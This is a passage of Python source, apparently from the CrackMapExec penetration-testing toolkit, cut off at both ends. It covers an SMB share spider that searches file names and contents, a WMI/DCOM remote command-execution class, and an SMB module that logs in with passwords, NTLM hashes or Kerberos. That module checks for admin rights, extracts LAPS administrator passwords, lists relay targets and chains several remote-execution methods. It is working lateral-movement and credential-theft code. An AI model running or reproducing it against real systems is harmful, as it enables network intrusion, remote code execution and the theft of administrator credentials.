subfolder.replace(\"*\", \"\") + result.get_longname(),\n depth - 1 if depth else None,\n )\n return\n\n def dir_list(self, files, path):\n path = path.replace(\"*\", \"\")\n for result in files:\n if self.pattern:\n for pattern in self.pattern:\n if bytes(result.get_longname().lower(), \"utf8\").find(bytes(pattern.lower(), \"utf8\")) != -1:\n if not self.onlyfiles and result.is_directory():\n self.logger.highlight(f\"//{self.smbconnection.getRemoteHost()}/{self.share}/{path}{result.get_longname()} [dir]\")\n else:\n self.logger.highlight(\n \"//{}/{}/{}{} [lastm:'{}' size:{}]\".format(\n self.smbconnection.getRemoteHost(),\n self.share,\n path,\n result.get_longname(),\n \"n\\\\a\" if not self.get_lastm_time(result) else self.get_lastm_time(result),\n result.get_filesize(),\n )\n )\n self.results.append(f\"{path}{result.get_longname()}\")\n if self.regex:\n for regex in self.regex:\n if regex.findall(bytes(result.get_longname(), \"utf8\")):\n if not self.onlyfiles and result.is_directory():\n self.logger.highlight(f\"//{self.smbconnection.getRemoteHost()}/{self.share}/{path}{result.get_longname()} [dir]\")\n else:\n self.logger.highlight(\n \"//{}/{}/{}{} [lastm:'{}' size:{}]\".format(\n self.smbconnection.getRemoteHost(),\n self.share,\n path,\n result.get_longname(),\n \"n\\\\a\" if not self.get_lastm_time(result) else self.get_lastm_time(result),\n result.get_filesize(),\n )\n )\n self.results.append(f\"{path}{result.get_longname()}\")\n\n if self.content:\n if not result.is_directory():\n self.search_content(path, result)\n\n return\n\n def search_content(self, path, result):\n path = path.replace(\"*\", \"\")\n try:\n rfile = RemoteFile(\n self.smbconnection,\n path + result.get_longname(),\n self.share,\n access=FILE_READ_DATA,\n )\n rfile.open()\n\n while True:\n try:\n contents = rfile.read(4096)\n if not contents:\n break\n except SessionError as e:\n if \"STATUS_END_OF_FILE\" in str(e):\n break\n\n except Exception:\n traceback.print_exc()\n break\n if self.pattern:\n for pattern in self.pattern:\n if contents.lower().find(bytes(pattern.lower(), \"utf8\")) != -1:\n self.logger.highlight(\n \"//{}/{}/{}{} [lastm:'{}' size:{} offset:{} pattern:'{}']\".format(\n self.smbconnection.getRemoteHost(),\n self.share,\n path,\n result.get_longname(),\n \"n\\\\a\" if not self.get_lastm_time(result) else self.get_lastm_time(result),\n result.get_filesize(),\n rfile.tell(),\n pattern,\n )\n )\n self.results.append(f\"{path}{result.get_longname()}\")\n if self.regex:\n for regex in self.regex:\n if regex.findall(contents):\n self.logger.highlight(\n \"//{}/{}/{}{} [lastm:'{}' size:{} offset:{} regex:'{}']\".format(\n self.smbconnection.getRemoteHost(),\n self.share,\n path,\n result.get_longname(),\n \"n\\\\a\" if not self.get_lastm_time(result) else self.get_lastm_time(result),\n result.get_filesize(),\n rfile.tell(),\n regex.pattern,\n )\n )\n self.results.append(f\"{path}{result.get_longname()}\")\n\n rfile.close()\n return\n\n except SessionError as e:\n if \"STATUS_SHARING_VIOLATION\" in str(e):\n pass\n\n except Exception:\n traceback.print_exc()\n\n def get_lastm_time(self, result_obj):\n lastm_time = None\n try:\n lastm_time = strftime(\"%Y-%m-%d %H:%M\", localtime(result_obj.get_mtime_epoch()))\n except Exception:\n pass\n\n return lastm_time\n" }, { "path": "cme/protocols/smb/wmiexec.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport ntpath\nimport os\nfrom time import sleep\nfrom cme.connection import dcom_FirewallChecker\nfrom cme.helpers.misc import gen_random_string\nfrom impacket.dcerpc.v5 import transport\nfrom impacket.dcerpc.v5.dcomrt import DCOMConnection\nfrom impacket.dcerpc.v5.dcom import wmi\nfrom impacket.dcerpc.v5.dtypes import NULL\n\n\nclass WMIEXEC:\n def __init__(\n self,\n target,\n share_name,\n username,\n password,\n domain,\n smbconnection,\n doKerberos=False,\n aesKey=None,\n kdcHost=None,\n hashes=None,\n share=None,\n logger=None,\n timeout=None,\n tries=None\n ):\n self.__target = target\n self.__username = username\n self.__password = password\n self.__domain = domain\n self.__lmhash = \"\"\n self.__nthash = \"\"\n self.__share = share\n self.__timeout = timeout\n self.__smbconnection = smbconnection\n self.__output = None\n self.__outputBuffer = b\"\"\n self.__share_name = share_name\n self.__shell = \"cmd.exe /Q /c \"\n self.__pwd = \"C:\\\\\"\n self.__aesKey = aesKey\n self.__kdcHost = kdcHost\n self.__doKerberos = doKerberos\n self.__retOutput = True\n self.__stringBinding = \"\"\n self.__tries = tries\n self.logger = logger\n\n if hashes is not None:\n # This checks to see if we didn't provide the LM Hash\n if hashes.find(\":\") != -1:\n self.__lmhash, self.__nthash = hashes.split(\":\")\n else:\n self.__nthash = hashes\n\n if self.__password is None:\n self.__password = \"\"\n self.__dcom = DCOMConnection(\n self.__target,\n self.__username,\n self.__password,\n self.__domain,\n self.__lmhash,\n self.__nthash,\n self.__aesKey,\n oxidResolver=True,\n doKerberos=self.__doKerberos,\n kdcHost=self.__kdcHost,\n )\n iInterface = self.__dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login, wmi.IID_IWbemLevel1Login)\n flag, self.__stringBinding = dcom_FirewallChecker(iInterface, self.__timeout)\n if not flag or not self.__stringBinding:\n error_msg = f'WMIEXEC: Dcom initialization failed on connection with stringbinding: \"{self.__stringBinding}\", please increase the timeout with the option \"--dcom-timeout\". If it\\'s still failing maybe something is blocking the RPC connection, try another exec method'\n \n if not self.__stringBinding:\n error_msg = \"WMIEXEC: Dcom initialization failed: can't get target stringbinding, maybe cause by IPv6 or any other issues, please check your target again\"\n \n self.logger.fail(error_msg) if not flag else self.logger.debug(error_msg)\n # Make it force break function\n self.__dcom.disconnect()\n iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface)\n iWbemServices = iWbemLevel1Login.NTLMLogin(\"//./root/cimv2\", NULL, NULL)\n iWbemLevel1Login.RemRelease()\n self.__win32Process, _ = iWbemServices.GetObject(\"Win32_Process\")\n\n def execute(self, command, output=False):\n self.__retOutput = output\n if self.__retOutput:\n self.__smbconnection.setTimeout(100000)\n if os.path.isfile(command):\n with open(command) as commands:\n for c in commands:\n self.execute_handler(c.strip())\n else:\n self.execute_handler(command)\n self.__dcom.disconnect()\n return self.__outputBuffer\n\n def cd(self, s):\n self.execute_remote(\"cd \" + s)\n if len(self.__outputBuffer.strip(\"\\r\\n\")) > 0:\n self.__outputBuffer = b\"\"\n else:\n self.__pwd = ntpath.normpath(ntpath.join(self.__pwd, s))\n self.execute_remote(\"cd \")\n self.__pwd = self.__outputBuffer.strip(\"\\r\\n\")\n self.__outputBuffer = b\"\"\n\n def output_callback(self, data):\n self.__outputBuffer += data\n\n def execute_handler(self, data):\n try:\n self.logger.debug(\"Executing remote\")\n self.execute_remote(data)\n except:\n self.cd(\"\\\\\")\n self.execute_remote(data)\n\n def execute_remote(self, data):\n self.__output = \"\\\\Windows\\\\Temp\\\\\" + gen_random_string(6)\n\n command = self.__shell + data\n if self.__retOutput:\n command += \" 1> \" + f\"{self.__output}\" + \" 2>&1\"\n\n self.logger.debug(\"Executing command: \" + command)\n self.__win32Process.Create(command, self.__pwd, None)\n self.get_output_remote()\n\n def execute_fileless(self, data):\n self.__output = gen_random_string(6)\n local_ip = self.__smbconnection.getSMBServer().get_socket().getsockname()[0]\n\n command = self.__shell + data + f\" 1> \\\\\\\\{local_ip}\\\\{self.__share_name}\\\\{self.__output} 2>&1\"\n\n self.logger.debug(\"Executing command: \" + command)\n self.__win32Process.Create(command, self.__pwd, None)\n self.get_output_fileless()\n\n def get_output_fileless(self):\n while True:\n try:\n with open(os.path.join(\"/tmp\", \"cme_hosted\", self.__output), \"r\") as output:\n self.output_callback(output.read())\n break\n except IOError:\n sleep(2)\n\n def get_output_remote(self):\n if self.__retOutput is False:\n self.__outputBuffer = \"\"\n return\n \n tries = 1\n while True:\n try:\n self.logger.info(f\"Attempting to read {self.__share}\\\\{self.__output}\")\n self.__smbconnection.getFile(self.__share, self.__output, self.output_callback)\n break\n except Exception as e:\n if tries >= self.__tries:\n self.logger.fail(f'WMIEXEC: Get output file error, maybe got detected by AV software, please increase the number of tries with the option \"--get-output-tries\". If it\\'s still failing maybe something is blocking the schedule job, try another exec method')\n break\n if str(e).find(\"STATUS_BAD_NETWORK_NAME\") >0 :\n self.logger.fail(f'SMB connection: target has blocked {self.__share} access (maybe command executed!)')\n break\n if str(e).find(\"STATUS_SHARING_VIOLATION\") >= 0 or str(e).find(\"STATUS_OBJECT_NAME_NOT_FOUND\") >= 0:\n sleep(2)\n tries += 1\n pass\n else:\n self.logger.debug(str(e))\n\n if self.__outputBuffer:\n self.logger.debug(f\"Deleting file {self.__share}\\\\{self.__output}\")\n self.__smbconnection.deleteFile(self.__share, self.__output)" }, { "path": "cme/protocols/smb.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport ntpath\nimport hashlib\nimport binascii\nfrom io import StringIO\nfrom Cryptodome.Hash import MD4\n\nfrom impacket.smbconnection import SMBConnection, SessionError\nfrom impacket.smb import SMB_DIALECT\nfrom impacket.examples.secretsdump import (\n RemoteOperations,\n SAMHashes,\n LSASecrets,\n NTDSHashes,\n)\nfrom impacket.nmb import NetBIOSError, NetBIOSTimeout\nfrom impacket.dcerpc.v5 import transport, lsat, lsad, scmr\nfrom impacket.dcerpc.v5.rpcrt import DCERPCException\nfrom impacket.dcerpc.v5.transport import DCERPCTransportFactory, SMBTransport\nfrom impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_GSS_NEGOTIATE\nfrom impacket.dcerpc.v5.epm import MSRPC_UUID_PORTMAP\nfrom impacket.dcerpc.v5.samr import SID_NAME_USE\nfrom impacket.dcerpc.v5.dtypes import MAXIMUM_ALLOWED\nfrom impacket.krb5.kerberosv5 import SessionKeyDecryptionError\nfrom impacket.krb5.types import KerberosException\nfrom impacket.dcerpc.v5.dtypes import NULL\nfrom impacket.dcerpc.v5.dcomrt import DCOMConnection\nfrom impacket.dcerpc.v5.dcom.wmi import CLSID_WbemLevel1Login, IID_IWbemLevel1Login, WBEM_FLAG_FORWARD_ONLY, IWbemLevel1Login\n\nfrom cme.config import process_secret, host_info_colors\nfrom cme.connection import *\nfrom cme.logger import CMEAdapter\nfrom cme.protocols.smb.firefox import FirefoxTriage\nfrom cme.servers.smb import CMESMBServer\nfrom cme.protocols.smb.wmiexec import WMIEXEC\nfrom cme.protocols.smb.atexec import TSCH_EXEC\nfrom cme.protocols.smb.smbexec import SMBEXEC\nfrom cme.protocols.smb.mmcexec import MMCEXEC\nfrom cme.protocols.smb.smbspider import SMBSpider\nfrom cme.protocols.smb.passpol import PassPolDump\nfrom cme.protocols.smb.samruser import UserSamrDump\nfrom cme.protocols.smb.samrfunc import SamrFunc\nfrom cme.protocols.ldap.laps import LDAPConnect, LAPSv2Extract\nfrom cme.protocols.ldap.gmsa import MSDS_MANAGEDPASSWORD_BLOB\nfrom cme.helpers.logger import highlight\nfrom cme.helpers.misc import *\nfrom cme.helpers.bloodhound import add_user_bh\nfrom cme.helpers.powershell import create_ps_command\n\nfrom dploot.triage.vaults import VaultsTriage\nfrom dploot.triage.browser import BrowserTriage\nfrom dploot.triage.credentials import CredentialsTriage\nfrom dploot.triage.masterkeys import MasterkeysTriage, parse_masterkey_file\nfrom dploot.triage.backupkey import BackupkeyTriage\nfrom dploot.lib.target import Target\nfrom dploot.lib.smb import DPLootSMBConnection\n\nfrom pywerview.cli.helpers import *\n\nfrom time import time\nfrom datetime import datetime\nfrom functools import wraps\nfrom traceback import format_exc\nimport logging\nfrom json import loads\nfrom termcolor import colored\n\nsmb_share_name = gen_random_string(5).upper()\nsmb_server = None\n\nsmb_error_status = [\n \"STATUS_ACCOUNT_DISABLED\",\n \"STATUS_ACCOUNT_EXPIRED\",\n \"STATUS_ACCOUNT_RESTRICTION\",\n \"STATUS_INVALID_LOGON_HOURS\",\n \"STATUS_INVALID_WORKSTATION\",\n \"STATUS_LOGON_TYPE_NOT_GRANTED\",\n \"STATUS_PASSWORD_EXPIRED\",\n \"STATUS_PASSWORD_MUST_CHANGE\",\n \"STATUS_ACCESS_DENIED\",\n \"STATUS_NO_SUCH_FILE\",\n \"KDC_ERR_CLIENT_REVOKED\",\n \"KDC_ERR_PREAUTH_FAILED\",\n]\n\n\ndef get_error_string(exception):\n if hasattr(exception, \"getErrorString\"):\n try:\n es = exception.getErrorString()\n except KeyError:\n return f\"Could not get nt error code {exception.getErrorCode()} from impacket: {exception}\"\n if type(es) is tuple:\n return es[0]\n else:\n return es\n else:\n return str(exception)\n\n\ndef requires_smb_server(func):\n def _decorator(self, *args, **kwargs):\n global smb_server\n global smb_share_name\n\n get_output = False\n payload = None\n methods = []\n\n try:\n payload = args[0]\n except IndexError:\n pass\n try:\n get_output = args[1]\n except IndexError:\n pass\n try:\n methods = args[2]\n except IndexError:\n pass\n\n if \"payload\" in kwargs:\n payload = kwargs[\"payload\"]\n if \"get_output\" in kwargs:\n get_output = kwargs[\"get_output\"]\n if \"methods\" in kwargs:\n methods = kwargs[\"methods\"]\n if not payload and self.args.execute:\n if not self.args.no_output:\n get_output = True\n if get_output or (methods and (\"smbexec\" in methods)):\n if not smb_server:\n self.logger.debug(\"Starting SMB server\")\n smb_server = CMESMBServer(\n self.cme_logger,\n smb_share_name,\n listen_port=self.args.smb_server_port,\n verbose=self.args.verbose,\n )\n smb_server.start()\n\n output = func(self, *args, **kwargs)\n if smb_server is not None:\n smb_server.shutdown()\n smb_server = None\n return output\n\n return wraps(func)(_decorator)\n\n\nclass smb(connection):\n def __init__(self, args, db, host):\n self.domain = None\n self.server_os = None\n self.os_arch = 0\n self.hash = None\n self.lmhash = \"\"\n self.nthash = \"\"\n self.remote_ops = None\n self.bootkey = None\n self.output_filename = None\n self.smbv1 = None\n self.signing = False\n self.smb_share_name = smb_share_name\n self.pvkbytes = None\n self.no_da = None\n self.no_ntlm = False\n self.protocol = \"SMB\"\n\n connection.__init__(self, args, db, host)\n\n def proto_logger(self):\n self.logger = CMEAdapter(\n extra={\n \"protocol\": \"SMB\",\n \"host\": self.host,\n \"port\": self.args.port,\n \"hostname\": self.hostname,\n }\n )\n\n def get_os_arch(self):\n try:\n string_binding = rf\"ncacn_ip_tcp:{self.host}[135]\"\n transport = DCERPCTransportFactory(string_binding)\n transport.set_connect_timeout(5)\n dce = transport.get_dce_rpc()\n if self.kerberos:\n dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)\n dce.connect()\n try:\n dce.bind(\n MSRPC_UUID_PORTMAP,\n transfer_syntax=(\"71710533-BEBA-4937-8319-B5DBEF9CCC36\", \"1.0\"),\n )\n except DCERPCException as e:\n if str(e).find(\"syntaxes_not_supported\") >= 0:\n dce.disconnect()\n return 32\n else:\n dce.disconnect()\n return 64\n except Exception as e:\n self.logger.debug(f\"Error retrieving os arch of {self.host}: {str(e)}\")\n\n return 0\n\n def enum_host_info(self):\n self.local_ip = self.conn.getSMBServer().get_socket().getsockname()[0]\n\n try:\n self.conn.login(\"\", \"\")\n except BrokenPipeError:\n self.logger.fail(f\"Broken Pipe Error while attempting to login\")\n except Exception as e:\n if \"STATUS_NOT_SUPPORTED\" in str(e):\n # no ntlm supported\n self.no_ntlm = True\n pass\n\n self.domain = self.conn.getServerDNSDomainName() if not self.no_ntlm else self.args.domain\n self.hostname = self.conn.getServerName() if not self.no_ntlm else self.host\n self.server_os = self.conn.getServerOS()\n self.logger.extra[\"hostname\"] = self.hostname\n\n if isinstance(self.server_os.lower(), bytes):\n self.server_os = self.server_os.decode(\"utf-8\")\n\n try:\n self.signing = self.conn.isSigningRequired() if self.smbv1 else self.conn._SMBConnection._Connection[\"RequireSigning\"]\n except Exception as e:\n self.logger.debug(e)\n pass\n\n self.os_arch = self.get_os_arch()\n self.output_filename = os.path.expanduser(f\"~/.cme/logs/{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}\".replace(\":\", \"-\"))\n\n if not self.domain:\n self.domain = self.hostname\n\n self.db.add_host(\n self.host,\n self.hostname,\n self.domain,\n self.server_os,\n self.smbv1,\n self.signing,\n )\n\n try:\n # DCs seem to want us to logoff first, windows workstations sometimes reset the connection\n self.conn.logoff()\n except Exception as e:\n self.logger.debug(f\"Error logging off system: {e}\")\n pass\n\n if self.args.domain:\n self.domain = self.args.domain\n if self.args.local_auth:\n self.domain = self.hostname\n\n def laps_search(self, username, password, ntlm_hash, domain):\n self.logger.extra[\"protocol\"] = \"LDAP\"\n self.logger.extra[\"port\"] = \"389\"\n\n ldapco = LDAPConnect(self.domain, \"389\", self.domain)\n\n if self.kerberos:\n if self.kdcHost is None:\n self.logger.fail(\"Add --kdcHost parameter to use laps with kerberos\")\n return False\n\n connection = ldapco.kerberos_login(\n domain,\n username[0] if username else \"\",\n password[0] if password else \"\",\n ntlm_hash[0] if ntlm_hash else \"\",\n kdcHost=self.kdcHost,\n aesKey=self.aesKey,\n )\n else:\n connection = ldapco.auth_login(\n domain,\n username[0] if username else \"\",\n password[0] if password else \"\",\n ntlm_hash[0] if ntlm_hash else \"\",\n )\n if not connection:\n self.logger.fail(f\"LDAP connection failed with account {username[0]}\")\n\n return False\n\n search_filter = \"(&(objectCategory=computer)(|(msLAPS-EncryptedPassword=*)(ms-MCS-AdmPwd=*)(msLAPS-Password=*))(name=\" + self.hostname + \"))\"\n attributes = [\n \"msLAPS-EncryptedPassword\",\n \"msLAPS-Password\",\n \"ms-MCS-AdmPwd\",\n \"sAMAccountName\",\n ]\n results = connection.search(searchFilter=search_filter, attributes=attributes, sizeLimit=0)\n\n msMCSAdmPwd = \"\"\n sAMAccountName = \"\"\n username_laps = \"\"\n\n from impacket.ldap import ldapasn1 as ldapasn1_impacket\n\n results = [r for r in results if isinstance(r, ldapasn1_impacket.SearchResultEntry)]\n if len(results) != 0:\n for host in results:\n values = {str(attr[\"type\"]).lower(): attr[\"vals\"][0] for attr in host[\"attributes\"]}\n if \"mslaps-encryptedpassword\" in values:\n msMCSAdmPwd = values[\"mslaps-encryptedpassword\"]\n d = LAPSv2Extract(\n bytes(msMCSAdmPwd),\n username[0] if username else \"\",\n password[0] if password else \"\",\n domain,\n ntlm_hash[0] if ntlm_hash else \"\",\n self.args.kerberos,\n self.args.kdcHost,\n 339)\n try:\n data = d.run()\n except Exception as e:\n self.logger.fail(str(e))\n return\n r = loads(data)\n msMCSAdmPwd = r[\"p\"]\n username_laps = r[\"n\"]\n elif \"mslaps-password\" in values:\n r = loads(str(values[\"mslaps-password\"]))\n msMCSAdmPwd = r[\"p\"]\n username_laps = r[\"n\"]\n elif \"ms-mcs-admpwd\" in values:\n msMCSAdmPwd = str(values[\"ms-mcs-admpwd\"])\n else:\n self.logger.fail(\"No result found with attribute ms-MCS-AdmPwd or msLAPS-Password\")\n logging.debug(f\"Host: {sAMAccountName:<20} Password: {msMCSAdmPwd} {self.hostname}\")\n else:\n self.logger.fail(f\"msMCSAdmPwd or msLAPS-Password is empty or account cannot read LAPS property for {self.hostname}\")\n\n return False\n\n self.username = self.args.laps if not username_laps else username_laps\n self.password = msMCSAdmPwd\n\n if msMCSAdmPwd == \"\":\n self.logger.fail(f\"msMCSAdmPwd or msLAPS-Password is empty or account cannot read LAPS property for {self.hostname}\")\n\n return False\n if ntlm_hash:\n hash_ntlm = hashlib.new(\"md4\", msMCSAdmPwd.encode(\"utf-16le\")).digest()\n self.hash = binascii.hexlify(hash_ntlm).decode()\n\n self.domain = self.hostname\n self.logger.extra[\"protocol\"] = \"SMB\"\n self.logger.extra[\"port\"] = \"445\"\n return True\n\n def print_host_info(self):\n signing = colored(f\"signing:{self.signing}\", host_info_colors[0], attrs=['bold']) if self.signing else colored(f\"signing:{self.signing}\", host_info_colors[1], attrs=['bold'])\n smbv1 = colored(f\"SMBv1:{self.smbv1}\", host_info_colors[2], attrs=['bold']) if self.smbv1 else colored(f\"SMBv1:{self.smbv1}\", host_info_colors[3], attrs=['bold'])\n self.logger.display(f\"{self.server_os}{f' x{self.os_arch}' if self.os_arch else ''} (name:{self.hostname}) (domain:{self.domain}) ({signing}) ({smbv1})\")\n if self.args.laps:\n return self.laps_search(self.args.username, self.args.password, self.args.hash, self.domain)\n return True\n\n def kerberos_login(self, domain, username, password=\"\", ntlm_hash=\"\", aesKey=\"\", kdcHost=\"\", useCache=False):\n logging.getLogger(\"impacket\").disabled = True\n # Re-connect since we logged off\n if not self.no_ntlm:\n fqdn_host = f\"{self.hostname}.{self.domain}\"\n else:\n fqdn_host = f\"{self.host}\"\n self.create_conn_obj(fqdn_host)\n lmhash = \"\"\n nthash = \"\"\n\n try:\n if not self.args.laps:\n self.password = password\n self.username = username\n # This checks to see if we didn't provide the LM Hash\n if ntlm_hash.find(\":\") != -1:\n lmhash, nthash = ntlm_hash.split(\":\")\n self.hash = nthash\n else:\n nthash = ntlm_hash\n self.hash = ntlm_hash\n if lmhash:\n self.lmhash = lmhash\n if nthash:\n self.nthash = nthash\n\n if not all(\"\" == s for s in [self.nthash, password, aesKey]):\n kerb_pass = next(s for s in [self.nthash, password, aesKey] if s)\n else:\n kerb_pass = \"\"\n self.logger.debug(f\"Attempting to do Kerberos Login with useCache: {useCache}\")\n\n self.conn.kerberosLogin( username, password, domain, lmhash, nthash, aesKey, kdcHost, useCache=useCache)\n self.check_if_admin()\n\n if username == \"\":\n self.username = self.conn.getCredentials()[0]\n else:\n self.username = username\n\n used_ccache = \" from ccache\" if useCache else f\":{process_secret(kerb_pass)}\"\n else:\n self.plaintext_login(self.hostname, username, password)\n return True\n\n out = f\"{self.domain}\\\\{self.username}{used_ccache} {self.mark_pwned()}\"\n self.logger.success(out)\n if not self.args.local_auth:\n add_user_bh(self.username, domain, self.logger, self.config)\n\n # check https://github.com/byt3bl33d3r/CrackMapExec/issues/321\n if self.args.continue_on_success and self.signing:\n try:\n self.conn.logoff()\n except:\n pass\n self.create_conn_obj()\n\n return True\n except SessionKeyDecryptionError:\n # success for now, since it's a vulnerability - previously was an error\n self.logger.success(\n f\"{domain}\\\\{self.username} account vulnerable to asreproast attack\",\n color=\"yellow\",\n )\n return False\n except (FileNotFoundError, KerberosException) as e:\n self.logger.fail(f\"CCache Error: {e}\")\n return False\n except OSError as e:\n used_ccache = \" from ccache\" if useCache else f\":{process_secret(kerb_pass)}\"\n self.logger.fail(f\"{domain}\\\\{self.username}{used_ccache} {e}\")\n except (SessionError, Exception) as e:\n error, desc = e.getErrorString()\n used_ccache = \" from ccache\" if useCache else f\":{process_secret(kerb_pass)}\"\n self.logger.fail(\n f\"{domain}\\\\{self.username}{used_ccache} {error} {f'({desc})' if self.args.verbose else ''}\",\n color=\"magenta\" if error in smb_error_status else \"red\",\n )\n if error not in smb_error_status:\n self.inc_failed_login(username)\n return False\n return False\n\n def plaintext_login(self, domain, username, password):\n # Re-connect since we logged off\n self.create_conn_obj()\n try:\n if not self.args.laps:\n self.password = password\n self.username = username\n self.domain = domain\n\n self.conn.login(self.username, self.password, domain)\n\n self.check_if_admin()\n self.logger.debug(f\"Adding credential: {domain}/{self.username}:{self.password}\")\n self.db.add_credential(\"plaintext\", domain, self.username, self.password)\n user_id = self.db.get_credential(\"plaintext\", domain, self.username, self.password)\n host_id = self.db.get_hosts(self.host)[0].id\n\n self.db.add_loggedin_relation(user_id, host_id)\n\n if self.admin_privs:\n self.logger.debug(f\"Adding admin user: {self.domain}/{self.username}:{self.password}@{self.host}\")\n self.db.add_admin_user(\n \"plaintext\",\n domain,\n self.username,\n self.password,\n self.host,\n user_id=user_id,\n )\n\n out = f\"{domain}\\\\{self.username}:{process_secret(self.password)} {self.mark_pwned()}\"\n self.logger.success(out)\n\n if not self.args.local_auth:\n add_user_bh(self.username, self.domain, self.logger, self.config)\n\n # check https://github.com/byt3bl33d3r/CrackMapExec/issues/321\n if self.args.continue_on_success and self.signing:\n try:\n self.conn.logoff()\n except:\n pass\n self.create_conn_obj()\n return True\n except SessionError as e:\n error, desc = e.getErrorString()\n self.logger.fail(\n f'{domain}\\\\{self.username}:{process_secret(self.password )} {error} {f\"({desc})\" if self.args.verbose else \"\"}',\n color=\"magenta\" if error in smb_error_status else \"red\",\n )\n if error not in smb_error_status:\n self.inc_failed_login(username)\n return False\n except (ConnectionResetError, NetBIOSTimeout, NetBIOSError) as e:\n self.logger.fail(f\"Connection Error: {e}\")\n return False\n except BrokenPipeError as e:\n self.logger.fail(f\"Broken Pipe Error while attempting to login\")\n return False\n\n def hash_login(self, domain, username, ntlm_hash):\n # Re-connect since we logged off\n self.create_conn_obj()\n lmhash = \"\"\n nthash = \"\"\n try:\n if not self.args.laps:\n self.username = username\n # This checks to see if we didn't provide the LM Hash\n if ntlm_hash.find(\":\") != -1:\n lmhash, nthash = ntlm_hash.split(\":\")\n self.hash = nthash\n else:\n nthash = ntlm_hash\n self.hash = ntlm_hash\n if lmhash:\n self.lmhash = lmhash\n if nthash:\n self.nthash = nthash\n else:\n nthash = self.hash\n\n self.domain = domain\n\n self.conn.login(self.username, \"\", domain, lmhash, nthash)\n\n self.check_if_admin()\n user_id = self.db.add_credential(\"hash\", domain, self.username, nthash)\n host_id = self.db.get_hosts(self.host)[0].id\n\n self.db.add_loggedin_relation(user_id, host_id)\n\n if self.admin_privs:\n self.db.add_admin_user(\"hash\", domain, self.username, nthash, self.host, user_id=user_id)\n\n out = f\"{domain}\\\\{self.username}:{process_secret(self.hash)} {self.mark_pwned()}\"\n self.logger.success(out)\n\n if not self.args.local_auth:\n add_user_bh(self.username, self.domain, self.logger, self.config)\n\n # check https://github.com/byt3bl33d3r/CrackMapExec/issues/321\n if self.args.continue_on_success and self.signing:\n try:\n self.conn.logoff()\n except:\n pass\n self.create_conn_obj()\n return True\n except SessionError as e:\n error, desc = e.getErrorString()\n self.logger.fail(\n f\"{domain}\\\\{self.username}:{process_secret(self.hash)} {error} {f'({desc})' if self.args.verbose else ''}\",\n color=\"magenta\" if error in smb_error_status else \"red\",\n )\n\n if error not in smb_error_status:\n self.inc_failed_login(self.username)\n return False\n except (ConnectionResetError, NetBIOSTimeout, NetBIOSError) as e:\n self.logger.fail(f\"Connection Error: {e}\")\n return False\n except BrokenPipeError as e:\n self.logger.fail(f\"Broken Pipe Error while attempting to login\")\n return False\n\n def create_smbv1_conn(self, kdc=\"\"):\n try:\n self.conn = SMBConnection(\n self.host if not kdc else kdc,\n self.host if not kdc else kdc,\n None,\n self.args.port,\n preferredDialect=SMB_DIALECT,\n timeout=self.args.smb_timeout,\n )\n self.smbv1 = True\n except socket.error as e:\n if str(e).find(\"Connection reset by peer\") != -1:\n self.logger.info(f\"SMBv1 might be disabled on {self.host if not kdc else kdc}\")\n return False\n except (Exception, NetBIOSTimeout) as e:\n self.logger.info(f\"Error creating SMBv1 connection to {self.host if not kdc else kdc}: {e}\")\n return False\n\n return True\n\n def create_smbv3_conn(self, kdc=\"\"):\n try:\n self.conn = SMBConnection(\n self.host if not kdc else kdc,\n self.host if not kdc else kdc,\n None,\n self.args.port,\n timeout=self.args.smb_timeout,\n )\n self.smbv1 = False\n except socket.error as e:\n # This should not happen anymore!!!\n if str(e).find(\"Too many open files\") != -1:\n if not self.logger:\n print(\"DEBUG ERROR: logger not set, please open an issue on github: \" + str(self) + str(self.logger))\n self.proto_logger()\n self.logger.fail(f\"SMBv3 connection error on {self.host if not kdc else kdc}: {e}\")\n return False\n except (Exception, NetBIOSTimeout) as e:\n self.logger.info(f\"Error creating SMBv3 connection to {self.host if not kdc else kdc}: {e}\")\n return False\n return True\n\n def create_conn_obj(self, kdc=\"\"):\n if self.create_smbv1_conn(kdc):\n return True\n elif self.create_smbv3_conn(kdc):\n return True\n return False\n\n def check_if_admin(self):\n rpctransport = SMBTransport(self.conn.getRemoteHost(), 445, r\"\\svcctl\", smb_connection=self.conn)\n dce = rpctransport.get_dce_rpc()\n try:\n dce.connect()\n except:\n pass\n else:\n try:\n dce.bind(scmr.MSRPC_UUID_SCMR)\n except:\n pass\n try:\n # 0xF003F - SC_MANAGER_ALL_ACCESS\n # http://msdn.microsoft.com/en-us/library/windows/desktop/ms685981(v=vs.85).aspx\n ans = scmr.hROpenSCManagerW(dce, f\"{self.host}\\x00\", \"ServicesActive\\x00\", 0xF003F)\n self.admin_privs = True\n except scmr.DCERPCException:\n self.admin_privs = False\n pass\n return\n\n def gen_relay_list(self):\n if self.server_os.lower().find(\"windows\") != -1 and self.signing is False:\n with sem:\n with open(self.args.gen_relay_list, \"a+\") as relay_list:\n if self.host not in relay_list.read():\n relay_list.write(self.host + \"\\n\")\n\n @requires_admin\n # @requires_smb_server\n def execute(self, payload=None, get_output=False, methods=None):\n if self.args.exec_method:\n methods = [self.args.exec_method]\n if not methods:\n methods = [\"wmiexec\", \"atexec\", \"smbexec\", \"mmcexec\"]\n\n if not payload and self.args.execute:\n payload = self.args.execute\n if not self.args.no_output:\n get_output = True\n \n current_method = \"\"\n for method in methods:\n current_method = method\n if method == \"wmiexec\":\n try:\n exec_method = WMIEXEC(\n self.host if not self.kerberos else self.hostname + \".\" + self.domain,\n self.smb_share_name,\n self.username,\n self.password,\n self.domain,\n self.conn,\n self.kerberos,\n self.aesKey,\n self.kdcHost,\n self.hash,\n self.args.share,\n logger=self.logger,\n timeout=self.args.dcom_timeout,\n tries=self.args.get_output_tries\n )\n self.logger.info(\"Executed command via wmiexec\")\n break\n except:\n self.logger.debug(\"Error executing command via wmiexec, traceback:\")\n self.logger.debug(format_exc())\n continue\n elif method == \"mmcexec\":\n try:\n exec_method = MMCEXEC(\n self.host if not self.kerberos else self.hostname + \".\" + self.domain,\n self.smb_share_name,\n self.username,\n self.password,\n self.domain,\n self.conn,\n self.args.share,\n self.hash,\n self.logger,\n self.args.get_output_tries,\n self.args.dcom_timeout\n )\n self.logger.info(\"Executed command via mmcexec\")\n break\n except:\n self.logger.debug(\"Error 